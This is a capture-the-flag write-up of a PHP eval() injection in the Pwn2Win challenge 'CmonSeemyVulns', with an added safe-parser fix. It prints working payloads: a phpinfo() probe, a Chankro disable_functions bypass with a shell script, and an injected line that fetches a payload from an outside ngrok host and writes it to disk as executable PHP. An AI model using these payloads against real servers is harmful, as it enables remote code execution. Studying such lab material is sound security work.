Pwn2Win - CmonSeemyVulns - Writeup


Description


We were given the source code and a Dockerfile, so we can build the challenge locally and work on it directly on our own system.


Code Review


Snipped code from index.php (PHP part only; shown in the original as a screenshot)

Line 7 of the snippet contains an eval() call inside the do_calcs function, and do_calcs is called on line 17. Before examining that further, look at line 4, which holds a regular expression pattern: it shows that our PHP code must be wrapped as {{PHP EVAL CODE}} for it to be captured and passed to eval.
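As an added example (not the challenge's own index.php), here is a hardened replacement for the do_calcs pattern described above: it evaluates arithmetic with a small recursive-descent parser instead of handing the {{...}} capture to eval(). Function names are assumed. This is the fix a defender would want, because restricting individual functions with disable_functions does not stop eval from running arbitrary PHP.

```php
<?php
// Added example, not the challenge's own code. calc_safe() replaces
// "eval the {{...}} capture" with a grammar that only knows numbers,
// + - * / and parentheses. eval() is never called.
function calc_safe(string $expr): float {
    preg_match_all('/\d+(?:\.\d+)?|[-+*\/()]/', $expr, $m);
    $t = $m[0];
    // Reject anything the tokeniser skipped (letters, quotes, $, ; ...),
    // so phpinfo() or any other PHP never reaches the evaluator.
    if (implode('', $t) !== preg_replace('/\s+/', '', $expr)) {
        throw new InvalidArgumentException('not an arithmetic expression');
    }
    $i = 0;
    $v = parse_sum($t, $i);
    if ($i !== count($t)) throw new InvalidArgumentException('trailing tokens');
    return $v;
}
// sum := product (('+' | '-') product)*
function parse_sum(array $t, int &$i): float {
    $v = parse_product($t, $i);
    while ($i < count($t) && ($t[$i] === '+' || $t[$i] === '-')) {
        $op = $t[$i++]; $r = parse_product($t, $i);
        $v = $op === '+' ? $v + $r : $v - $r;
    }
    return $v;
}
// product := atom (('*' | '/') atom)*
function parse_product(array $t, int &$i): float {
    $v = parse_atom($t, $i);
    while ($i < count($t) && ($t[$i] === '*' || $t[$i] === '/')) {
        $op = $t[$i++]; $r = parse_atom($t, $i);
        if ($op === '/' && $r == 0.0) throw new DomainException('division by zero');
        $v = $op === '*' ? $v * $r : $v / $r;
    }
    return $v;
}
// atom := number | '-' atom | '(' sum ')'
function parse_atom(array $t, int &$i): float {
    if (!isset($t[$i])) throw new InvalidArgumentException('unexpected end');
    $tok = $t[$i++];
    if ($tok === '(') {
        $v = parse_sum($t, $i);
        if (($t[$i++] ?? null) !== ')') throw new InvalidArgumentException('missing )');
        return $v;
    }
    if ($tok === '-') return -parse_atom($t, $i);
    if (is_numeric($tok)) return (float) $tok;
    throw new InvalidArgumentException("unexpected token $tok");
}
```

With this in place, a request such as 200,{{phpinfo()}} is rejected at the tokeniser check rather than executed, while 200,{{2*(3+4)}} still evaluates to 14.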

Solution

Let's try sending a simple payload: 200,{{phpinfo()}}

The phpinfo() call is executed:


But if we look at the disable_functions list in the phpinfo output, we see which functions are restricted and not available to us:

exec,system,passthru,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname,pcntl_exec,expect_popen

To bypass disable_functions we can use Chankro.

First let’s build our payload:

python2 chankro.py --arch 64 --input shell.sh --path /var/www/html --output exploit.txt

The shell.sh content:

#!/bin/sh
/readflag > /var/www/html/flag.txt

Now that the generated payload (exploit.txt) is saved, we host it on a local web server (PHP's or Python's built-in server) that the target can reach, and have the vulnerable eval fetch it and write it to disk:

200,{{file_put_contents("/var/www/html/exploit.php",file_get_contents("http://XXXXXXXXX.ngrok.io/exploit.txt"),FILE_APPEND)}}

After that we browse to http://127.0.0.1:1337/exploit.php to trigger it.

Flag

We should then be able to retrieve the flag at http://127.0.0.1:1337/flag.txt.